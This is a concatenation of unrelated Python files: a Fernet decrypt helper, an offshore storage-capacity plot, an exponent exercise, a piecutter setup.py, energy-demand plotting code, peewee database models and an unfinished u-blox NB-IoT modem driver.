    Returns the decrypted plaintext (bytes) on success.  On failure prints
    "Invalid Token" and returns "" -- note the fallback is a str, kept for
    backward compatibility with existing callers.
    """
    # FIXES: the bare ``except:`` swallowed every exception (including
    # KeyboardInterrupt/SystemExit), and the result variable shadowed the
    # builtin ``str``.
    try:
        plaintext = key.decrypt(token)
    except Exception:
        print("Invalid Token")
        plaintext = ""
    return plaintext
#message = b"hello world"
#message = "hello world"
#password = b"password"
#salt = os.urandom(16)
#salt = b"hello"
#kdf = PBKDF2HMAC(
# algorithm=hashes.SHA256(),
# length=32,
# salt=salt,
# iterations=100000
# )
#key = base64.urlsafe_b64encode(kdf.derive(password))
#f = Fernet(key)
#token = f.encrypt(bytes(message.encode()))
#token = f.encrypt(message)
#print(token)
#b'...'
#print(f.decrypt(token))
#b'Secret Message!'
| 1,248 | 502 |
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from mpl_toolkits.axes_grid1.inset_locator import zoomed_inset_axes, mark_inset
from math import pi
import numpy as np
import matplotlib.colors as colors
import matplotlib.patches as mpatches
# Load the site analysis results; one row per grid cell.
df = pd.read_csv('all_analysis.csv')
# f, a = plt.subplots(2,1)
# a = a.ravel()
#
# sns.scatterplot(data=df, x='NEAR_DIST',y='feasible_fr', hue='NEAR_FC', ax=a[0])
#
# sns.scatterplot(data=df, x='NEAR_DIST',y='RASTERVALU', hue='NEAR_FC', ax=a[1])
# conversions and column renaming
df.loc[:, 'Distance to shore (km)'] = df.loc[:, 'NEAR_DIST'] / 1000.0  # NEAR_DIST is in metres
df.loc[:, 'Water depth (m)'] = df.loc[:, 'RASTERVALU']
df.loc[:, 'Feasibility (%)'] = df.loc[:, 'feasible_fr'] * 100.0  # fraction -> percent
df.loc[:, 'Formation (-)'] = df.loc[:, 'formation']
df.loc[:, 'Nearest State (-)'] = df.loc[:, 'NEAR_FC']
# Map raw shapefile/formation codes to display names.
loc_dict = {'VA_shore': 'Virginia', 'MD_shore': 'Maryland', 'NJ_shore': 'New Jersey', 'DE_shore': 'Delaware',
            'NY_shore': 'New York', 'MA_shore': 'Massachusetts', 'RI_shore': 'Rhode Island'}
formation_dict = {'LK1': 'Lower Cretaceous', 'MK1-3': 'Middle Cretaceous', 'UJ1': 'Upper Jurassic'}
# rename  (raises KeyError if an unexpected code appears -- intentional guard)
for loc in df.loc[:, 'Nearest State (-)'].unique():
    ind = df.loc[:, 'Nearest State (-)'] == loc
    df.loc[ind, 'Nearest State (-)'] = loc_dict[loc]
# rename
for formation in df.loc[:, 'Formation (-)'].unique():
    ind = df.loc[:, 'Formation (-)'] == formation
    df.loc[ind, 'Formation (-)'] = formation_dict[formation]
# Filter data with feasibility greater than 0.8
# df = df[df.loc[:,'Feasibility (%)']>=0.8]
# Filter data with mean RTE greater than 0.5
# df = df[df.loc[:, 'RTE_mean'] >= 0.5]
sns.histplot(df, x='Water depth (m)')
df.loc[:, 'RTE [%]'] = df.loc[:, 'RTE_mean']
# Categorise water depth; depths are negative, so later (shallower)
# assignments deliberately overwrite the earlier ones.
df.loc[:, 'Water depth'] = '> 60m'
df.loc[df.loc[:, 'Water depth (m)'] > -60.0, 'Water depth'] = '30m - 60m'
df.loc[df.loc[:, 'Water depth (m)'] > -30.0, 'Water depth'] = '<30 m'
# sns.histplot(df, x='RTE [%]', hue='Water depth', hue_order=['<30 m', '30m - 60m', '> 60m'])
# Three-step blue palette (dark -> light), converted from RGB to hex.
palette_rgb = np.array([[69, 117, 180],
                        [145, 191, 219],
                        [224, 243, 248]])
palette_hex = []
for rgb in palette_rgb:
    palette_hex.append(colors.rgb2hex(rgb / 255))
# cmap = colors.ListedColormap(palette_hex)
# Calculate storage potential per grid cell:
# n_wells = usable cell area / well footprint; capacity = n_wells * MWh/well.
frac = 0.1  # fraction of grid available for storage
A_grid = 19790 * 19790  # each square is 20 km by 20 km
well_MWh = 200 * 24  # 200 MW at 24 hour duration
df.loc[:, 'A_well'] = pi * df.loc[:, 'r_f'] ** 2  # well footprint from radius r_f
df.loc[:, 'n_wells'] = frac * A_grid / df.loc[:, 'A_well']
df.loc[:, 'MWh'] = df.loc[:, 'n_wells'] * well_MWh
# bin results: sum MWh capacity into (RTE range, depth range) cells.
entries = ['RTE', 'MWh', 'Depth']  # NOTE(review): unused -- kept for compatibility
RTE_bins = [0.40, 0.50, 0.60, 0.65]
RTE_labels = ['40 - 50', '50 - 60', '> 60']
Depth_bins = np.arange(0.0, -200.1, -10.0)  # 0 to -200 m in 10 m steps
df_smry = pd.DataFrame(index=RTE_labels, columns=Depth_bins[:-1])
# FIX: DataFrame.append was deprecated in pandas 1.4 and removed in 2.0;
# collect the high-efficiency slices and concatenate once at the end.
_high_eff_parts = []
for i in range(len(RTE_bins) - 1):
    for j in range(len(Depth_bins) - 1):
        # Select rows falling inside this (RTE, depth) bin.
        ind = (RTE_bins[i] <= df.loc[:, 'RTE_mean']) & (df.loc[:, 'RTE_mean'] < RTE_bins[i + 1]) \
              & (Depth_bins[j + 1] < df.loc[:, 'Water depth (m)']) & (df.loc[:, 'Water depth (m)'] <= Depth_bins[j])
        # store result
        df_smry.loc[RTE_labels[i], Depth_bins[j]] = df.loc[ind, 'MWh'].sum()
        if RTE_bins[i] >= 0.60:
            _high_eff_parts.append(df.loc[ind, :])
df_highEff = pd.concat(_high_eff_parts, ignore_index=True) if _high_eff_parts else pd.DataFrame()
# plot: stacked bar of storage capacity vs water depth, stacked by RTE band.
widths = []
# Bar widths equal each depth bin's span (10 m).
for j in range(len(Depth_bins) - 1):
    widths.append(Depth_bins[j] - Depth_bins[j + 1])
# Stack from the lowest-efficiency band upward (hence reversed order).
for i, index in enumerate(reversed(df_smry.index)):
    # ind = df_smry.loc[:, 'RTE'] == RTE_label
    x = df_smry.columns * -1.0  # plot depths as positive values
    height = df_smry.loc[index, :] / 1e6  # TWh
    if i == 0:
        plt.bar(x, height, width=widths, label=index, align='edge', color=palette_hex[i])
        bottom = height
    else:
        plt.bar(x, height, bottom=bottom, width=widths, label=index, align='edge', color=palette_hex[i])
        bottom = bottom + height
# Add outline
plt.step(x, bottom, 'k', where='post')
# labels
plt.xlabel('Water depth (m)')
plt.ylabel('Storage capacity (TWh)')
# limits
xlims = [0.0, Depth_bins[-1] * -1.0]
ylims = [0.0, 400]
plt.xlim(left=xlims[0], right=xlims[1])
plt.ylim(bottom=ylims[0], top=ylims[1])
# Additional line - Wind turbines (60 m fixed/floating foundation boundary)
plt.plot([60.0, 60.0], ylims, 'k--')
# set background color
# ax = plt.gca()
# ax.set_facecolor((0.95, 0.95, 0.95))
# create legend  (patch order reversed so the legend reads low -> high RTE)
ax = plt.gca()
patches = [mpatches.Patch(edgecolor='black', facecolor=palette_hex[2], label=RTE_labels[0]),
           mpatches.Patch(edgecolor='black', facecolor=palette_hex[1], label=RTE_labels[1]),
           mpatches.Patch(edgecolor='black', facecolor=palette_hex[0], label=RTE_labels[2])]
leg1 = ax.legend(handles=patches, bbox_to_anchor=(1.0, 1.0), loc="upper right", title='Round-trip Efficiency (%)')
# Add text annotations either side of the 60 m boundary line.
plt.text(35, 375, 'Fixed bottom\nwind turbines', horizontalalignment='center', verticalalignment='center',
         fontsize='medium')
plt.text(85, 375, 'Floating\nwind turbines', horizontalalignment='center', verticalalignment='center',
         fontsize='medium')
# Add arrows pointing away from the boundary into each regime.
ax.arrow(x=60 - 5, y=350, dx=-25, dy=0.0, width=2.0, color='black')
ax.arrow(x=60 + 5, y=350, dx=25, dy=0.0, width=2.0, color='black')
# Set size
# Column width guidelines https://www.elsevier.com/authors/author-schemas/artwork-and-media-instructions/artwork-sizing
# Single column: 90mm = 3.54 in
# 1.5 column: 140 mm = 5.51 in
# 2 column: 190 mm = 7.48 i
width = 8.0  # inches
height = 6.5  # inches
# Resize the current figure before saving.
f = plt.gcf()
f.set_size_inches(width, height)
#
savename = "Fig3_storage_potential.png"
plt.savefig(savename, dpi=400)
# Report total capacity in water shallower than 60 m, first for every bin
# with RTE above 50%, then for the >60% bins alone.
shallow_cols = [0, -10, -20, -30, -40, -50]
for rows, label in ((['50 - 60', '> 60'], '>50%'),
                    (['> 60'], '>60%')):
    total_MWh = df_smry.loc[rows, shallow_cols].sum().sum()
    total_GWh = total_MWh / 1000
    print('GWh RTE ' + label + ' and water depth <60m: ' + str(total_GWh))
# save high efficiency and shallow water sites to csv
df_highEff.to_csv('high_efficiency_and_shallow_sites.csv')
############ With a function ##########################
# Read the base M and exponent N from standard input.
print('Valor de M:')
M = int(input())
print('Valor de N:')
N = int(input())
def potencia(M, N):
    """Return M raised to the non-negative integer power N by repeated multiplication."""
    acumulado = 1
    for _ in range(N):
        acumulado *= M
    return acumulado
# Show the same result three ways: the ** operator, builtin pow(), and
# the hand-rolled potencia() above.
print(M**N)
print(pow(M, N))
print(potencia(M,N))
######################### With a list comprehension ########################
print('Valor de M:')
M = int(input())
print('Valor de N:')
N = int(input())
# FIXES: the result list was named ``list`` (shadowing the builtin), and the
# print concatenated the ``str`` *type* instead of converting the list to a
# string, which raised TypeError.
potencias = [i**N for i in range(0, N)]
print('Potencias, ' + str(potencias))
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Python packaging."""
import os
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
class Tox(TestCommand):
    """Test command that runs tox (``python setup.py test``)."""
    def finalize_options(self):
        TestCommand.finalize_options(self)
        # Tox drives its own discovery; clear the default test arguments.
        self.test_args = []
        self.test_suite = True
    def run_tests(self):
        import tox  # import here, cause outside the eggs aren't loaded.
        # Exit with tox's return code so CI sees failures.
        errno = tox.cmdline(self.test_args)
        sys.exit(errno)
#: Absolute path to directory containing setup.py file.
here = os.path.abspath(os.path.dirname(__file__))
#: Boolean, ``True`` if environment is running Python version 2.
IS_PYTHON2 = sys.version_info[0] == 2
# Data for use in setup.
NAME = 'piecutter'
DESCRIPTION = 'Templating framework.'
# FIX: README/VERSION were opened without ever closing the file handles;
# read them through context managers instead.
with open(os.path.join(here, 'README.rst')) as readme_file:
    README = readme_file.read()
with open(os.path.join(here, 'VERSION')) as version_file:
    VERSION = version_file.read().strip()
AUTHOR = u'Rémy HUBSCHER'
EMAIL = 'hubscher.remy@gmail.com'
LICENSE = 'BSD'
URL = 'https://{name}.readthedocs.io/'.format(name=NAME)
CLASSIFIERS = [
    'Development Status :: 3 - Alpha',
    'Intended Audience :: Developers',
    'License :: OSI Approved :: BSD License',
    'Natural Language :: English',
    'Programming Language :: Python :: 2.7',
    'Programming Language :: Python :: 3.3',
]
KEYWORDS = [
    'template',
    'templates',
    'template engine',
    'jinja2',
    'django',
    'generator',
    'file generation',
    'scaffold',
]
PACKAGES = [NAME.replace('-', '_')]
REQUIREMENTS = [
    'Django',
    'jinja2',
    'requests',
    'setuptools',
    'six',
]
if IS_PYTHON2:
    # mock is in the stdlib (unittest.mock) from Python 3.3 onward.
    REQUIREMENTS.extend(['mock'])
ENTRY_POINTS = {}
TEST_REQUIREMENTS = ['tox']
CMDCLASS = {'test': Tox}
if __name__ == '__main__':  # Do not run setup() when we import this module.
    setup(
        name=NAME,
        version=VERSION,
        description=DESCRIPTION,
        long_description=README,
        classifiers=CLASSIFIERS,
        # setuptools expects keywords as a single space-separated string.
        keywords=' '.join(KEYWORDS),
        author=AUTHOR,
        author_email=EMAIL,
        url=URL,
        license=LICENSE,
        packages=PACKAGES,
        include_package_data=True,
        zip_safe=False,
        install_requires=REQUIREMENTS,
        entry_points=ENTRY_POINTS,
        tests_require=TEST_REQUIREMENTS,
        cmdclass=CMDCLASS,
    )
| 2,353 | 838 |
"""Plotting model results and storing as PDF to result folder
"""
import os
import logging
from energy_demand.technologies import tech_related
from energy_demand.plotting import plotting_styles
from energy_demand.plotting import fig_lad_related
from energy_demand.plotting import fig_one_fueltype_multiple_regions_peak_h
from energy_demand.plotting import fig_fuels_enduses_y
from energy_demand.plotting import fig_stacked_enduse
from energy_demand.plotting import fig_cross_graphs
from energy_demand.plotting import fig_stacked_enduse_sectors
from energy_demand.plotting import fig_lf
from energy_demand.plotting import fig_fuels_enduses_week
from energy_demand.plotting import fig_load_profile_dh_multiple
from energy_demand.plotting import fig_fuels_peak_h
from energy_demand.plotting import fig_weather_variability_priod
#matplotlib.use('Agg') # Used to make it work in linux179
def run_all_plot_functions(
        results_container,
        reg_nrs,
        regions,
        lookups,
        result_paths,
        assumptions,
        enduses,
        plot_crit,
        base_yr,
        comparison_year
):
    """Summary function to plot all results.

    Arguments
    ---------
    results_container : dict
        Model results, e.g. 'ed_fueltype_regs_yh', 'reg_load_factor_y',
        'results_enduse_every_year', 'av_season_daytype_cy'.
    reg_nrs : int
        Number of modelled regions.
    regions : list
        Region names.
    lookups : dict
        Lookup tables; must contain 'fueltypes'.
    result_paths : dict
        Output paths; PDFs are written to result_paths['data_results_PDF'].
    assumptions : dict
        Model assumptions; must contain 'sim_yrs'.
    enduses : dict
        Enduses per submodel ('residential', 'service', 'industry').
    plot_crit : dict
        Boolean flags selecting which plots to generate.
    base_yr : int
        Base year of the simulation.
    comparison_year : int
        Year to generate comparison plots.
    """
    if plot_crit['plot_lad_cross_graphs']:
        try:
            # Plot cross graph where every region is a dot
            fig_cross_graphs.plot_cross_graphs(
                base_yr=base_yr,
                comparison_year=comparison_year,
                regions=regions,
                ed_year_fueltype_regs_yh=results_container['ed_fueltype_regs_yh'],
                reg_load_factor_y=results_container['reg_load_factor_y'],
                fueltype_int=lookups['fueltypes']['electricity'],
                fueltype_str='electricity',
                fig_name=os.path.join(
                    result_paths['data_results_PDF'], "comparions_LAD_cross_graph_electricity_by_cy.pdf"),
                label_points=False,
                plotshow=False)
            fig_cross_graphs.plot_cross_graphs(
                base_yr=base_yr,
                comparison_year=comparison_year,
                regions=regions,
                ed_year_fueltype_regs_yh=results_container['ed_fueltype_regs_yh'],
                reg_load_factor_y=results_container['reg_load_factor_y'],
                fueltype_int=lookups['fueltypes']['gas'],
                fueltype_str='gas',
                fig_name=os.path.join(
                    result_paths['data_results_PDF'], "comparions_LAD_cross_graph_gas_by_cy.pdf"),
                label_points=False,
                plotshow=False)
        except KeyError:
            logging.info("Check if correct comparison year is provided, i.e. really data exists for this year")
    # ----------
    # Plot LAD differences for first and last year
    # ----------
    try:
        fig_lad_related.plot_lad_comparison(
            base_yr=2015,
            comparison_year=2050,
            regions=regions,
            ed_year_fueltype_regs_yh=results_container['ed_fueltype_regs_yh'],
            fueltype_int=lookups['fueltypes']['electricity'],
            fueltype_str='electricity',
            fig_name=os.path.join(
                result_paths['data_results_PDF'], "comparions_LAD_modelled_electricity_by_cy.pdf"),
            label_points=False,
            plotshow=False)
        logging.info("... plotted by-cy LAD energy demand comparison")
        # Plot peak h for every hour
        fig_lad_related.lad_comparison_peak(
            base_yr=2015,
            comparison_year=2050,
            regions=regions,
            ed_year_fueltype_regs_yh=results_container['ed_fueltype_regs_yh'],
            fueltype_int=lookups['fueltypes']['electricity'],
            fueltype_str='electricity',
            fig_name=os.path.join(
                result_paths['data_results_PDF'], "comparions_LAD_modelled_electricity_peakh_by_cy.pdf"),
            label_points=False,
            plotshow=False)
        logging.info("... plotted by-cy LAD peak hour comparison")
    except Exception:
        # Best effort: the comparison needs data for 2015 and 2050 which may
        # not exist in every run. Previously a bare `except: pass` swallowed
        # all errors (incl. KeyboardInterrupt) silently; log instead.
        logging.warning("Could not plot LAD comparison plots", exc_info=True)
    # ----------------
    # Plot demand for every region over time
    # -------------------
    if plot_crit['plot_line_for_every_region_of_peak_demand']:
        logging.info("... plot fuel per fueltype for every region over annual teimsteps")
        fig_one_fueltype_multiple_regions_peak_h.plt_regions_peak_h(
            results_container['ed_fueltype_regs_yh'],
            lookups,
            regions,
            os.path.join(
                result_paths['data_results_PDF'],
                'peak_h_total_electricity.pdf'),
            fueltype_str_to_plot="electricity")
    if plot_crit['plot_fuels_enduses_y']:
        #... Plot total fuel (y) per fueltype as line chart"
        fig_fuels_enduses_y.run(
            results_container['ed_fueltype_regs_yh'],
            lookups,
            os.path.join(
                result_paths['data_results_PDF'],
                'y_fueltypes_all_enduses.pdf'))
    # ------------
    # Plot stacked annual enduses
    # ------------
    if plot_crit['plot_stacked_enduses']:
        rs_enduses_sorted = [
            'rs_space_heating',
            'rs_water_heating',
            'rs_lighting',
            'rs_cold',
            'rs_wet',
            'rs_consumer_electronics',
            'rs_home_computing',
            'rs_cooking']
        ss_enduses_sorted = [
            'ss_space_heating',
            'ss_water_heating',
            'ss_lighting',
            'ss_catering',
            'ss_small_power',
            'ss_fans',
            'ss_cooling_humidification',
            'ss_ICT_equipment',
            'ss_other_gas',
            'ss_other_electricity',
            'ss_cooled_storage']
        is_enduses_sorted = [
            'is_space_heating',
            'is_lighting',
            'is_refrigeration',
            'is_motors',
            'is_compressed_air',
            'is_high_temp_process',
            'is_low_temp_process',
            'is_other',
            'is_drying_separation']
        rs_color_list = plotting_styles.rs_color_list_selection()
        ss_color_list = plotting_styles.ss_color_list_selection()
        is_color_list = plotting_styles.is_color_list_selection()
        # Residential
        fig_stacked_enduse.run(
            assumptions['sim_yrs'],
            results_container['results_enduse_every_year'],
            rs_enduses_sorted,
            rs_color_list,
            os.path.join(
                result_paths['data_results_PDF'], "stacked_rs_country.pdf"),
            plot_legend=True)
        # Service
        fig_stacked_enduse.run(
            assumptions['sim_yrs'],
            results_container['results_enduse_every_year'],
            ss_enduses_sorted,
            ss_color_list,
            os.path.join(
                result_paths['data_results_PDF'], "stacked_ss_country.pdf"),
            plot_legend=True)
        # Industry
        fig_stacked_enduse.run(
            assumptions['sim_yrs'],
            results_container['results_enduse_every_year'],
            is_enduses_sorted,
            is_color_list,
            os.path.join(
                result_paths['data_results_PDF'], "stacked_is_country_.pdf"),
            plot_legend=True)
    # ------------------------------
    # Plot annual demand for enduses for all submodels
    # ------------------------------
    if plot_crit['plot_y_all_enduses']:
        fig_stacked_enduse_sectors.run(
            lookups,
            assumptions['sim_yrs'],
            results_container['results_enduse_every_year'],
            enduses['residential'],
            enduses['service'],
            enduses['industry'],
            os.path.join(result_paths['data_results_PDF'],
                         "stacked_all_enduses_country.pdf"))
    # --------------
    # Fuel per fueltype for whole country over annual timesteps
    # ----------------
    # NOTE(review): this duplicates the 'plot_fuels_enduses_y' section above
    # (same flag, same output file). Kept for behavioral compatibility.
    if plot_crit['plot_fuels_enduses_y']:
        logging.info("... plot fuel per fueltype for whole country over annual timesteps")
        #... Plot total fuel (y) per fueltype as line chart"
        fig_fuels_enduses_y.run(
            results_container['ed_fueltype_regs_yh'],
            lookups,
            os.path.join(
                result_paths['data_results_PDF'],
                'y_fueltypes_all_enduses.pdf'))
    # ----------
    # Plot seasonal typical load profiles
    # Averaged load profile per daytpe for a region
    # ----------
    # ------------------------------------
    # Load factors per fueltype and region
    # ------------------------------------
    if plot_crit['plot_lf']:
        for fueltype_str, fueltype_int in lookups['fueltypes'].items():
            '''fig_lf.plot_seasonal_lf(
                fueltype_int,
                fueltype_str,
                results_container['load_factor_seasons'],
                reg_nrs,
                os.path.join(
                    result_paths['data_results_PDF'],
                    'lf_seasonal_{}.pdf'.format(fueltype_str)))'''
            '''fig_lf.plot_lf_y(
                fueltype_int,
                fueltype_str,
                results_container['reg_load_factor_yd'],
                reg_nrs,
                os.path.join(
                    result_paths['data_results_PDF'], 'lf_yd_{}.pdf'.format(fueltype_str)))'''
            # reg_load_factor_yd = max daily value / average annual daily value
            fig_lf.plot_lf_y(
                fueltype_int,
                fueltype_str,
                results_container['reg_load_factor_y'],
                reg_nrs,
                os.path.join(
                    result_paths['data_results_PDF'],
                    'lf_y_{}.pdf'.format(fueltype_str)))
    # --------------
    # Fuel week of base year
    # ----------------
    if plot_crit['plot_week_h']:
        fig_fuels_enduses_week.run(
            results_resid=results_container['ed_fueltype_regs_yh'],
            lookups=lookups,
            hours_to_plot=range(7 * 24),
            year_to_plot=2015,
            fig_name=os.path.join(result_paths['data_results_PDF'], "tot_all_enduse03.pdf"))
    # ------------------------------------
    # Plot averaged per season and fueltype
    # ------------------------------------
    if plot_crit['plot_averaged_season_fueltype']:
        for year in results_container['av_season_daytype_cy'].keys():
            for fueltype_int in results_container['av_season_daytype_cy'][year].keys():
                fueltype_str = tech_related.get_fueltype_str(
                    lookups['fueltypes'], fueltype_int)
                fig_load_profile_dh_multiple.run(
                    path_fig_folder=result_paths['data_results_PDF'],
                    path_plot_fig=os.path.join(
                        result_paths['data_results_PDF'],
                        'season_daytypes_by_cy_comparison__{}__{}.pdf'.format(year, fueltype_str)),
                    calc_av_lp_modelled=results_container['av_season_daytype_cy'][year][fueltype_int],    # current year
                    calc_av_lp_real=results_container['av_season_daytype_cy'][base_yr][fueltype_int],     # base year
                    calc_lp_modelled=results_container['season_daytype_cy'][year][fueltype_int],          # current year
                    calc_lp_real=results_container['season_daytype_cy'][base_yr][fueltype_int],           # base year
                    plot_peak=True,
                    plot_all_entries=False,
                    plot_max_min_polygon=True,
                    plotshow=False,
                    plot_radar=plot_crit['plot_radar_seasonal'],
                    max_y_to_plot=120,
                    fueltype_str=fueltype_str,
                    year=year)
    # ---------------------------------
    # Plot hourly peak loads over time for different fueltypes
    # --------------------------------
    if plot_crit['plot_h_peak_fueltypes']:
        fig_fuels_peak_h.run(
            results_container['ed_fueltype_regs_yh'],
            lookups,
            os.path.join(
                result_paths['data_results_PDF'],
                'fuel_fueltypes_peak_h.pdf'))
    # Use logging (consistent with the rest of the module) instead of print.
    logging.info("finished plotting")
| 12,205 | 3,658 |
from playhouse.sqlite_ext import *
from playhouse.migrate import *
from peewee import *
# The initialisation
# SQLite database used as a local cache. WAL journaling allows concurrent
# readers while one writer is active.
db = SqliteDatabase('../cache/iconic.db', pragmas={
    'journal_mode': 'wal',        # write-ahead logging for better concurrency
    'cache_size': '-2000',        # negative value = size in KiB (~2 MB)
    'fullfsync': 'on',            # extra durability (macOS F_FULLFSYNC)
    'journal_size_limit': '-1',   # no limit on journal size
    'threads': '8',               # auxiliary threads for large sorts
    'foreign_keys': 1,  # Enforce foreign-key constraints
})
# The initialisation
# NOTE(review): a plaintext database password was committed in the comment
# below; it has been redacted. Rotate the credential and load secrets from
# the environment/config instead of source code.
#network = MySQLDatabase('iconic', user='root', host='127.0.0.1', password='<redacted>')
class BaseModel(Model):
    """Base class binding every model in this module to the SQLite db above."""
    class Meta:
        # All subclasses share the same database connection.
        database = db
# class BaseNetwork(Model):
#     class Meta:
#         database = network
class Author(BaseModel):
    """An author profile plus scraper bookkeeping fields.

    NOTE(review): field names (h_index, cited_by_count, subject_areas)
    suggest this mirrors a Scopus author record — confirm against the
    scraper that populates it.
    """
    # External author id (primary key, not auto-generated).
    id = BigIntegerField(unique=True, index=True, primary_key=True)
    full_name = JSONField(null=True)
    subject_areas = JSONField(null=True)
    document_count = BigIntegerField(null=True)
    cited_by_count = BigIntegerField(null=True)
    citations_count = BigIntegerField(null=True)
    h_index = BigIntegerField(null=True)
    coauthors_count = BigIntegerField(null=True)
    # Data about affiliation
    affiliation_current = JSONField(null=True)
    cat = JSONField(null=True)
    country = JSONField(null=True)
    # Scraper bookkeeping: fetch status and pagination resume point.
    docs_fetched = BooleanField(default=False)
    last_page = BigIntegerField(null=True,default=0)
    is_sample = BooleanField(default=False)
    citations = JSONField(null=True)
class Collaboration(BaseModel):
    """A publication record used to derive author collaborations."""
    # Abstract/document id (primary key, externally assigned).
    abs_id = BigIntegerField(unique=True, index=True, primary_key=True)
    authors = JSONField(null=True)
    published = DateField(null=True)
    cited_by = IntegerField(null=True)
    keywords = JSONField(null=True)
    coll_count = IntegerField(null=True)   # number of collaborators on the paper
    message = TextField(null=True)         # free-text status/error message
    saved = BooleanField(default=False)    # whether the record was persisted downstream
class Coauthors(BaseModel):
    """Cached co-author list for one author."""
    # Author id this co-author list belongs to (primary key).
    id = BigIntegerField(unique=True, index=True, primary_key=True)
    co_list = JSONField(null=True)         # list of co-author entries
    last_page = IntegerField(null=True)    # pagination resume point for the scraper
    saved = BooleanField(default=False)
# class AuthorDetails(BaseNetwork):
# id = BigAutoField(unique=True, index=True, primary_key=True)
# full_name = TextField(null=True)
# preferred_name = TextField(null=True)
# affiliation_id = BigIntegerField(unique=True, index=True, null=True)
# url = TextField(null=True)
# class Network(BaseNetwork):
# id = BigAutoField(unique=True, index=True, primary_key=True)
# from_author = BigIntegerField(index=True)
# to_author = BigIntegerField(index=True)
# article = BigIntegerField(index=True)
# keywords = JSONField(null=True)
# year = IntegerField(null=True)
# citations = IntegerField(null=True)
# class Affiliation(BaseNetwork):
# url = TextField(null=True)
| 2,637 | 866 |
import time
import serial
import binascii
from collections import namedtuple
import logging
from ublox.socket import UDPSocket
logger = logging.getLogger(__name__)
# One radio-statistics entry, e.g. Stats('RADIO', 'Signal power', -682).
Stats = namedtuple('Stats', 'type name value')
class CMEError(Exception):
    """CME ERROR reported by the module."""
class ATError(Exception):
    """AT Command Error"""
class ATTimeoutError(ATError):
    """Making an AT Action took too long"""
class ConnectionTimeoutError(ATTimeoutError):
    """Module did not connect within the specified time"""
class SaraN211Module:
    """
    Represents a Ublox SARA N211 module.
    Power-optimized NB-IoT (LTE Cat NB1) module.

    Communicates with the module over a serial port using AT commands and
    tracks connection state, radio statistics and open sockets on the
    instance.
    """
    # Serial link parameters (N211 uses 9600 baud, no hardware flow control).
    BAUDRATE = 9600
    RTSCTS = False
    # AT command strings issued by this driver.
    AT_ENABLE_NETWORK_REGISTRATION = 'AT+CEREG=1'
    AT_ENABLE_SIGNALING_CONNECTION_URC = 'AT+CSCON=1'
    AT_ENABLE_POWER_SAVING_MODE = 'AT+NPSMR=1'
    AT_ENABLE_ALL_RADIO_FUNCTIONS = 'AT+CFUN=1'
    AT_REBOOT = 'AT+NRB'
    AT_CLOSE_SOCKET = 'AT+NSOCL'
    AT_GET_IP = 'AT+CGPADDR'
    AT_SEND_TO = 'AT+NSOST'
    AT_CHECK_CONNECTION_STATUS = 'AT+CSCON?'
    AT_RADIO_INFORMATION = 'AT+NUESTATS="RADIO"'
    # Seconds to wait after AT_REBOOT before using the port again.
    REBOOT_TIME = 0
    SUPPORTED_SOCKET_TYPES = ['UDP']
    def __init__(self, serial_port: str, roaming=False, echo=False):
        """
        :param serial_port: device path of the serial port, e.g. '/dev/ttyUSB0'
        :param roaming: whether to expect a roaming registration (CEREG: 5)
        :param echo: whether the module echoes commands back on the line
        """
        self._serial_port = serial_port
        self._serial = serial.Serial(self._serial_port, baudrate=self.BAUDRATE,
                                     rtscts=self.RTSCTS, timeout=5)
        self.echo = echo
        self.roaming = roaming
        self.ip = None
        self.connected = False
        # socket_id -> UbloxSocket, so sockets can be reused until closed.
        self.sockets = {}
        self.available_messages = list()
        self.imei = None
        # TODO: make a class containing all states
        self.registration_status = 0
        # Radio statistics, populated by update_radio_statistics().
        self.radio_signal_power = None
        self.radio_total_power = None
        self.radio_tx_power = None
        self.radio_tx_time = None
        self.radio_rx_time = None
        self.radio_cell_id = None
        self.radio_ecl = None
        self.radio_snr = None
        self.radio_earfcn = None
        self.radio_pci = None
        self.radio_rsrq = None
        self.radio_rsrp = None
    def reboot(self):
        """
        Rebooting the module. Will run the AT_REBOOT command and also flush the
        serial port to get rid of trash input from when the module restarted.
        """
        logger.info('Rebooting module')
        self._at_action(self.AT_REBOOT)
        logger.info('waiting for module to boot up')
        time.sleep(self.REBOOT_TIME)
        # NOTE(review): flushInput()/flushOutput() are deprecated in
        # pyserial 3.0+ in favour of reset_input_buffer()/reset_output_buffer().
        self._serial.flushInput()  # Flush the serial ports to get rid of crap.
        self._serial.flushOutput()
        logger.info('Module rebooted')
    def setup(self):
        """
        Running all commands to get the module up an working
        """
        logger.info(f'Starting initiation process')
        self.enable_signaling_connection_urc()
        self.enable_network_registration()
        self.enable_psm_mode()
        self.enable_radio_functions()
        logger.info(f'Finished initiation process')
    def enable_psm_mode(self):
        """
        Enable Power Save Mode
        """
        self._at_action(self.AT_ENABLE_POWER_SAVING_MODE)
        logger.info('Enabled Power Save Mode')
    def enable_signaling_connection_urc(self):
        """
        Enable Signaling Connection URC
        """
        self._at_action(self.AT_ENABLE_SIGNALING_CONNECTION_URC)
        logger.info('Signaling Connection URC enabled')
    def enable_network_registration(self):
        """
        Enable Network registration
        """
        self._at_action(self.AT_ENABLE_NETWORK_REGISTRATION)
        logger.info('Network registration enabled')
    def enable_radio_functions(self):
        """
        Enable all radio functions.
        """
        self._at_action(self.AT_ENABLE_ALL_RADIO_FUNCTIONS)
        logger.info('All radio functions enabled')
    def connect(self, operator: int, roaming=False):
        """
        Will initiate commands to connect to operators network and wait until
        connected.

        :param operator: numeric operator code (MCC+MNC); falsy selects
            automatic operator selection (AT+COPS=0).
        """
        logger.info(f'Trying to connect to operator {operator} network')
        # TODO: Handle connection independent of home network or roaming.
        if operator:
            at_command = f'AT+COPS=1,2,"{operator}"'
        else:
            at_command = f'AT+COPS=0'
        self._at_action(at_command, timeout=300)
        self._await_connection(roaming or self.roaming)
        logger.info(f'Connected to {operator}')
    def create_socket(self, socket_type='UDP', port: int = None):
        """
        Will return a socket-like object that mimics normal python
        sockets. The socket will then translate the commands to correct method
        calls on the module.
        It will also register the socket on the module class so that they can be
        reused in the future if they are not closed.
        :param socket_type:
        :param port:
        :return: UbloxSocket
        """
        logger.info(f'Creating {socket_type} socket')
        if socket_type.upper() not in self.SUPPORTED_SOCKET_TYPES:
            raise ValueError(f'Module does not support {socket_type} sockets')
        sock = None
        if socket_type.upper() == 'UDP':
            sock = self._create_upd_socket(port)
        elif socket_type.upper() == 'TCP':
            sock = self._create_tcp_socket(port)
        logger.info(f'{socket_type} socket created')
        self.sockets[sock.socket_id] = sock
        return sock
    def _create_upd_socket(self, port):
        """
        Will create a UDP-socket for the N211 module
        """
